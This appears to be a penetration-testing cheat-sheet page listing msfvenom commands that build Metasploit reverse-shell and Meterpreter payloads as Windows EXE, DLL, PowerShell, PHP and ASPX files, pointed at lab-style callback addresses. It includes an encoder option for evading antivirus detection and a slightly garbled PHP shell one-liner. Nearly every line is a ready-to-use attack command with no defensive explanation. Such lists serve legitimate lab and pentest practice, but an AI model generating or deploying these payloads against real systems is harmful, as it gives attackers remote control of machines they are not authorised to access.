Category: Category: Metasploit Payloads
msfvenom payloads
Use non-staged for netcat listener! E.g. windows/shell_reverse_tcp EXE
1 2 |
msfvenom -p windows/x64/shell/reverse_tcp LHOST=10.10.14.4 LPORT=4449 -f exe -o winpay64.exe |
1 2 |
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.17 LPORT=4444 –platform windows -a x86 -e x86/shikata_ga_nai -I 3 -b “\x00” -f exe -o payload.exe |
DLL
1 2 |
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=80 -f dll -o pentestlab2.dll |
Ps1
1 2 |
msfvenom -p windows/meterpreter/reverse_winhttps HandlerSSLCert=www.sentry.co.com.pem StagerVerifySSLCert=True LHOST=tun0 LPORT=443 EXITFUNC=thread -f psh-reflection > mlw2.ps1 |
PHP
1 2 |
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ‘<!--?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php<br ?--> |
ASPX
1 2 |
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.17 LPORT=1233 -f aspx |
[…]
Read More →